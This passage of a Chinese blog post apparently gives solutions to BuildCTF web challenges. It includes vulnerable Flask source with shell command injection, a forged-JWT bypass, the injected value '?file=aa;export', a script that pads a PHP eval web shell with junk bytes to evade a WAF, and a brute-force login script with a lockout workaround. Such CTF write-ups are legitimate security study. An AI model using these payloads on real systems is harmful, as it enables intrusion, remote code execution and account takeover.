class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> datetime</span><br><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, jsonify, render_template, request, abort, redirect, url_for, flash, make_response</span><br><span class="line"><span class="keyword">from</span> werkzeug.security <span class="keyword">import</span> generate_password_hash, check_password_hash</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = <span class="string">&#x27;BuildCTF&#x27;</span></span><br><span class="line">app.config[<span class="string">&#x27;JWT_SECRET_KEY&#x27;</span>] = <span class="string">&#x27;BuildCTF&#x27;</span></span><br><span class="line"></span><br><span class="line">DOCUMENT_DIR = os.path.abspath(<span class="string">&#x27;src/docs&#x27;</span>)</span><br><span class="line">users = &#123;&#125;</span><br><span class="line"></span><br><span class="line">messages = []</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/message&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">message</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        name = request.form.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line">        content = request.form.get(<span class="string">&#x27;content&#x27;</span>)</span><br><span class="line"></span><br><span class="line">        messages.append(&#123;<span class="string">&#x27;name&#x27;</span>: name, <span class="string">&#x27;content&#x27;</span>: content&#125;)</span><br><span class="line">        flash(<span class="string">&#x27;Message posted&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;message&#x27;</span>))  </span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;message.html&#x27;</span>, messages=messages)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/register&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        username = request.form.get(<span class="string">&#x27;username&#x27;</span>)</span><br><span class="line">        password = request.form.get(<span class="string">&#x27;password&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> username <span class="keyword">in</span> users:</span><br><span class="line">            flash(<span class="string">&#x27;Username already exists&#x27;</span>)</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;register&#x27;</span>))</span><br><span class="line">        users[username] = &#123;<span class="string">&#x27;password&#x27;</span>: generate_password_hash(password), <span class="string">&#x27;role&#x27;</span>: <span class="string">&#x27;user&#x27;</span>&#125;</span><br><span class="line">        flash(<span class="string">&#x27;User registered successfully&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;login&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;register.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/login&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>, <span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        username = request.form.get(<span class="string">&#x27;username&#x27;</span>)</span><br><span class="line">        password = request.form.get(<span class="string">&#x27;password&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> username <span class="keyword">in</span> users <span class="keyword">and</span> check_password_hash(users[username][<span class="string">&#x27;password&#x27;</span>], password):</span><br><span class="line">            access_token = jwt.encode(&#123;</span><br><span class="line">                <span class="string">&#x27;sub&#x27;</span>: username,</span><br><span class="line">                <span class="string">&#x27;role&#x27;</span>: users[username][<span class="string">&#x27;role&#x27;</span>],</span><br><span class="line">                <span class="string">&#x27;exp&#x27;</span>: datetime.datetime.utcnow() + datetime.timedelta(minutes=<span class="number">30</span>)</span><br><span class="line">            &#125;, app.config[<span class="string">&#x27;JWT_SECRET_KEY&#x27;</span>], algorithm=<span class="string">&#x27;HS256&#x27;</span>)</span><br><span class="line">            response = make_response(render_template(<span class="string">&#x27;page.html&#x27;</span>))</span><br><span class="line">            response.set_cookie(<span class="string">&#x27;jwt&#x27;</span>, access_token, httponly=<span class="literal">True</span>, secure=<span class="literal">True</span>, samesite=<span class="string">&#x27;Lax&#x27;</span>,path=<span class="string">&#x27;/&#x27;</span>)</span><br><span class="line">            <span class="comment"># response.set_cookie(&#x27;jwt&#x27;, access_token, httponly=True, secure=False, samesite=&#x27;None&#x27;,path=&#x27;/&#x27;)</span></span><br><span class="line">            <span class="keyword">return</span> response</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> jsonify(&#123;<span class="string">&quot;msg&quot;</span>: <span class="string">&quot;Invalid username or password&quot;</span>&#125;), <span class="number">401</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;login.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/logout&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">logout</span>():</span><br><span class="line">    resp = make_response(redirect(url_for(<span class="string">&#x27;index&#x27;</span>)))</span><br><span class="line">    resp.set_cookie(<span class="string">&#x27;jwt&#x27;</span>, <span class="string">&#x27;&#x27;</span>, expires=<span class="number">0</span>)</span><br><span class="line">    flash(<span class="string">&#x27;You have been logged out&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> resp</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/page&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">page</span>():</span><br><span class="line">    jwt_token = request.cookies.get(<span class="string">&#x27;jwt&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> jwt_token:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            payload = jwt.decode(jwt_token, app.config[<span class="string">&#x27;JWT_SECRET_KEY&#x27;</span>], algorithms=[<span class="string">&#x27;HS256&#x27;</span>])</span><br><span class="line">            current_user = payload[<span class="string">&#x27;sub&#x27;</span>]</span><br><span class="line">            role = payload[<span class="string">&#x27;role&#x27;</span>]</span><br><span class="line">        <span class="keyword">except</span> jwt.ExpiredSignatureError:</span><br><span class="line">            <span class="keyword">return</span> jsonify(&#123;<span class="string">&quot;msg&quot;</span>: <span class="string">&quot;Token has expired&quot;</span>&#125;), <span class="number">401</span></span><br><span class="line">        <span class="keyword">except</span> jwt.InvalidTokenError:</span><br><span class="line">            <span class="keyword">return</span> jsonify(&#123;<span class="string">&quot;msg&quot;</span>: <span class="string">&quot;Invalid token&quot;</span>&#125;), <span class="number">401</span></span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="keyword">return</span> jsonify(&#123;<span class="string">&quot;msg&quot;</span>: <span class="string">&quot;Invalid or expired token&quot;</span>&#125;), <span class="number">401</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> role != <span class="string">&#x27;admin&#x27;</span> <span class="keyword">or</span> current_user <span class="keyword">not</span> <span class="keyword">in</span> users:</span><br><span class="line">            <span class="keyword">return</span> abort(<span class="number">403</span>, <span class="string">&#x27;Access denied&#x27;</span>)</span><br><span class="line"></span><br><span class="line">        file = request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        file_path = os.path.join(DOCUMENT_DIR, file)</span><br><span class="line">        file_path = os.path.normpath(file_path)</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> file_path.startswith(DOCUMENT_DIR):</span><br><span class="line">            <span class="keyword">return</span> abort(<span class="number">400</span>, <span class="string">&#x27;Invalid file name&#x27;</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            content = subprocess.check_output(<span class="string">f&#x27;cat <span class="subst">&#123;file_path&#125;</span>&#x27;</span>, shell=<span class="literal">True</span>, text=<span class="literal">True</span>)</span><br><span class="line">        <span class="keyword">except</span> subprocess.CalledProcessError <span class="keyword">as</span> e:</span><br><span class="line">            content = <span class="built_in">str</span>(e)</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            content = <span class="built_in">str</span>(e)</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&#x27;page.html&#x27;</span>, content=content)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> abort(<span class="number">403</span>, <span class="string">&#x27;Access denied&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/categories&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">categories</span>():</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;categories.html&#x27;</span>, categories=[<span class="string">&#x27;Web&#x27;</span>, <span class="string">&#x27;Pwn&#x27;</span>, <span class="string">&#x27;Misc&#x27;</span>, <span class="string">&#x27;Re&#x27;</span>, <span class="string">&#x27;Crypto&#x27;</span>])</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">5050</span>)</span><br></pre></td></tr></table></figure>
<p>主要执行命令的位置，这里我们可以控制文件路径，只需要绕过前面的身份验证即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">content = subprocess.check_output(<span class="string">f&#x27;cat <span class="subst">&#123;file_path&#125;</span>&#x27;</span>, shell=<span class="literal">True</span>, text=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>
<p>首先需要先去login一个身份，进行登入时就会有一个set-cookie</p>
<p><img src="/images/build7.png" width="95%" height="80%"></p>
<p>最后需要通过伪造jwt来实现身份绕过</p>
<p>app.secret_key = ‘BuildCTF’直接通过jwt.io来进行绕过即可</p>
<p>最后带着jwt来访问page就可以提交file,这里执行命令时对空格进行了特殊处理,flag在环境变量里面</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=aa;export</span><br></pre></td></tr></table></figure>
<h3 id="ez-waf"><a href="#ez-waf" class="headerlink" title="ez_waf"></a>ez_waf</h3><p>通过脏数据来绕过waf，这里的文件上传没有过滤文件名，所以可以直接提交php文件，但是过滤了太多的符号</p>
<p>&lt;=等等，所以根本无法构造正常的木马</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;qwe.php&#x27;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    file.write(<span class="string">&#x27;1&#x27;</span> * <span class="number">100000</span>)</span><br><span class="line">    file.write(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">    file.write(<span class="string">&quot;&lt;?php @eval($_POST[&#x27;a&#x27;]);?&gt;&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>直接通过蚁剑连接即可</p>
<h3 id="tflock"><a href="#tflock" class="headerlink" title="tflock"></a>tflock</h3><p>这个题当时没有写出来，看了看题解，也是笑了，原来是环境的问题</p>
<p>首先在robots.txt下获取提示，在/passwordList里面有爆破的密码</p>
<p>首先可以通过该密码进行登入</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ctfer:<span class="number">123456</span></span><br><span class="line">admin:x</span><br></pre></td></tr></table></figure>
<p>这里主要是要爆破出admin登入的密码，但是这里需要注意如果账户已经锁定，爆破的时候还是锁定的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;http://27.25.151.80:45304/login.php&#x27;</span></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line">ctfer = &#123;</span><br><span class="line"> <span class="string">&#x27;username&#x27;</span>: <span class="string">&#x27;ctfer&#x27;</span>,</span><br><span class="line"> <span class="string">&#x27;password&#x27;</span>: <span class="string">&#x27;123456&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">aaa = requests.post(url, data=ctfer)</span><br><span class="line"><span class="keyword">for</span> password <span class="keyword">in</span> <span class="built_in">open</span>(<span class="string">&#x27;password.txt&#x27;</span>):</span><br><span class="line">    admin = &#123;</span><br><span class="line">    <span class="string">&#x27;username&#x27;</span>: <span class="string">&#x27;admin&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;password&#x27;</span>: password.replace(<span class="string">&#x27;\n&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">     &#125;</span><br><span class="line">    aaa = requests.post(url, data=admin)</span><br><span class="line">    <span class="built_in">print</span>(aaa.text)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;true&quot;</span> <span class="keyword">in</span> aaa.text:</span><br><span class="line">        <span class="built_in">print</span>(admin)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        aaa = requests.post(url, data=ctfer)</span><br></pre></td></tr></table></figure>
<p>最后提交即可得flag</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/09/25/BaseCTF2024%E9%A2%98%E8%A7%A3/" rel="prev" title="BaseCTF2024题解">
                  <i class="fa fa-angle-left"></i> BaseCTF2024题解
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/11/04/SHCTF2024/" rel="next" title="SHCTF2024">
                  SHCTF2024 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">luokuang</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>




    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
